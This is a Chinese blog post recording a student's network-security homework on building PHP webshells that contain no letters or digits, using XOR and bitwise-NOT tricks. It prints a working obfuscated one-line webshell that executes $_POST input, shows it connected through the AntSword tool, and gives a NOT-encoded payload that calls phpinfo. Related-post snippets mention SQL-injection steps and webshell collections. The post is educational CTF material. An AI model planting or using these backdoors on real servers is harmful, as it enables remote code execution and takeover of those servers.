网安第六次作业

最新推荐文章于 2023-08-20 01:47:05 发布
最新推荐文章于 2023-08-20 01:47:05 发布
阅读量56 收藏
点赞数
文章标签: 原型模式 redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CCFYY_/article/details/132385801
版权

一、异或

当$ 和 _ 没有被限制时

1、异或的前置知识
在这里插入图片描述

A的ascll码为65 二进制为0100 0001
的ascll码为96 二进制为0110 0000 A和 取异或 即相同位 置0 ,不同位置 1
然后A 和 ` 得到的二进制码为 0010 0001 ,ascll码为33 ,ascll码表对应符号为!
在这里插入图片描述

2、进阶版异或
代码:

<?php
        function B(){
                echo "at the function";
        }
        $__="?" ^ "}";
        echo "\$__值为:$__";
        $__();
?>

在这里插入图片描述

?:0011 1111
} :0111 1101
0100 0010 -----66
在这里插入图片描述
所以异或的结果为B,将值赋值给了$__;
在这里插入图片描述
在这里插入图片描述

3、异或构建一句话木马

<?php
        $_++; //$_=1
        $__=("#" ^ "|"); // _
        $__.=("." ^ "~"); //_P   // .为拼接字符
        $__.=("/" ^ "`"); //_PO
        $__.=("|" ^ "/"); //_POS
        $__.=("{" ^ "/"); //_POST
        ${$__}[!$_](${$__}[$_]);  //$_POST[0]($_POST[1]);
?>

使用蚁剑连接这个一句话木马;

在这里插入图片描述
在这里插入图片描述

需要绕过的正则:
在这里插入图片描述

在这里插入图片描述

二、取反

代码:

<?php
        $a = "phpinfo";
        echo urlencode(~$a);
?>

在这里插入图片描述

phpinfo 取反的值为: %8F%97%8F%96%91%99%90

?code= =   _=~%8F%97%8F%96%91%99%90; = _();

三、自增

四、临时文件

在这里插入图片描述

C先生_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安第三天作业
m0_52438027的博客
07-17 330
不会记录SELECT和SHOW这类操作,因为这类操作对数据本身并没有修改,但可以通过查询通用日志来查看MySQL执行过的所有语句。主从复制mysqlreplication在master端开启binlog,master把它的二进制日志传递给slaves来达到master-slave数据一致的目的。二进制日志(binnarylog)以事件形式记录了对MySQL数据库执行更改的所有操作。需要注意的一点是,即便update操作没有造成数据变化,也是会记入binlog。...
我的网安作业2/7
wwp的博客
02-07 148
一、sqli-labs less4: 打开less4的index.php文件,在SQL语句下添加如下两句: echo $sql; echo "<br>"; 1.判断是否存在注入: http://127.0.0.1/sqli/Less-4/?id=1 http://127.0.0.1/sqli/Less-4/?id=1'显式正确 http://127.0.0.1/sqli/Less-4/?id=1"显式不正确 得到报错信息: 根据报错信息构造正确的SQL语句: http://127.0.0
测试成功的log备份webshell代码
02-12
测试成功的log备份webshell代码。 郑重声明:此代码收集于网络,仅用于个人计算机技术学习,用于非法用途者后果自负,本人不承担任何责任和连带责任!
不包含字母和数字的webshell
m0_59049258的博客
08-19 454
当$ 和 _ 没有被限制时。
PHP代码注入详解
Zeker62的博客
08-16 5157
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP
构造不包含字母和数字的webshell
weixin_54347738的博客
08-20 183
assert(eval())是可以的,assert中执行了eval函数。这里面1提交过去的是字符串,assert函数无法执行字符串。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!第二行中,ascii码,>的大于
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
weixin_33943347的博客
08-06 754
0x01 前言 最近在做代码审计的工作中遇到了一个难题,题目描述如下: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ die("Long."); } if(preg_ma...
周玉川-2017221302006-网安技术第六次作业1
08-08
(2)实现包过滤几乎不再需要费用 (3)包过滤路由器对用户和应用来说是透明的 (2)只能阻止一种类型的IP欺骗 (3)任何直接经过路由器的数据包都有被用作数据驱
周玉川-2017221302006-网安技术第四次作业1
08-03
例如,二进制数110表示属主有读写权限,属组和其他用户只有读权限,对应的十进制数为6。 5. Windows 访问控制: Windows 的访问控制有两种模式:本地模式和域模式。域模式下,系统由域控制器管理,用户和设备必须...
第6次网安实验1
08-04
1. 爆破 web 网站后台,进入后台上传 webshell 3. 通过 phpmyadmin 写 webshell 4. 通过代理扫描内网 5. 通过数据库中
东南大学网安学院模式识别作业答案&考试真题回忆版
02-26
这门课很简单,可以翘课,跟着PPT自学就行,但是课后作业是重中之重,考试范围的百分之九十都是从做过的作业里面变式。无论你有多摆,请认真对待这门课的作业,因为他量很少,但是很有用!期末的真题回忆的很粗糙,...
无字母数字的webshell
weixin_43940853的博客
02-29 1732
构造无数字字母的webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 8034
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
无字母数字webshell总结
hackzkaq的博客
05-07 1969
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
RCE无参数构造
nobugnomoney的博客
05-24 1354
一、RCE无参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
浅析无字符数字构造webshell
Lemon's blog
08-31 2092
前言: 之前在命令执行的时候多少学了一点,但发现如果不自己去动手实践一下会忘的很快,这次就来动手实践一番。恰好最近做了很多有关无字符数字的CTF题,恰好可以作为例子说一下。 基础知识 0x00:PHP中的异或 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。 异或规则 0&0=0 1&1=0 0&1=1 1&0=1 两个二
php危险函数总结
我是齐潇啊
03-28 5484
php危险函数笔记总结以及实操结果
无字符webshell
zip471642048的博客
12-14 2167
catflag无字符webshell 本地搭了一个环境,可以看见正则那一块过滤数字和字母。 无字符webshell 在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。 <?php '#'^'|'; //得到字符 _ '.'^'~'; //得到字符 P '/'^'`'; //得到字符 0 '|'^'/'; //得到字符 S '{'^'/'; //得到字符 T $_=("#
github网安项目
最新发布
04-24
GitHub是一个基于Web的代码托管平台,它提供了版本控制和协作功能,让开发者可以方便地共享和管理代码。在GitHub上,有很多与网安相关的项目,这些项目致力于保护网络安全、防止黑客攻击和提高系统的安全性。以下是一些常见的GitHub网安项目: 1. OWASP(开放式Web应用程序安全项目):OWASP是一个致力于提高Web应用程序安全性的国际组织。他们在GitHub上维护了一系列开源项目,包括安全工具、漏洞测试和安全指南等。 2. Metasploit:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列工具和资源,帮助安全专家评估和增强系统的安全性。Metasploit在GitHub上有一个官方仓库,开发者可以在这里获取最新的代码和贡献自己的改进。 3. Snort:Snort是一个开源的入侵检测系统(IDS),它可以监测网络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上,开发者可以参与到项目中,改进和定制自己的IDS规则。 4. Nmap:Nmap是一个网络扫描和主机发现工具,它可以帮助安全专家评估网络的安全性。Nmap的源代码也在GitHub上开放,用户可以自由地访问和贡献代码。 5. Security Shepherd:Security Shepherd是一个教育性的Web应用程序,旨在帮助开发者学习和理解常见的Web安全漏洞。它提供了一系列的挑战和实验,供用户测试和提高自己的安全技能。Security Shepherd的代码也在GitHub上开源。 这些项目只是GitHub上众多网安项目的一小部分,你可以通过在GitHub上搜索关键词来找到更多与网安相关的项目。希望这些信息对你有帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值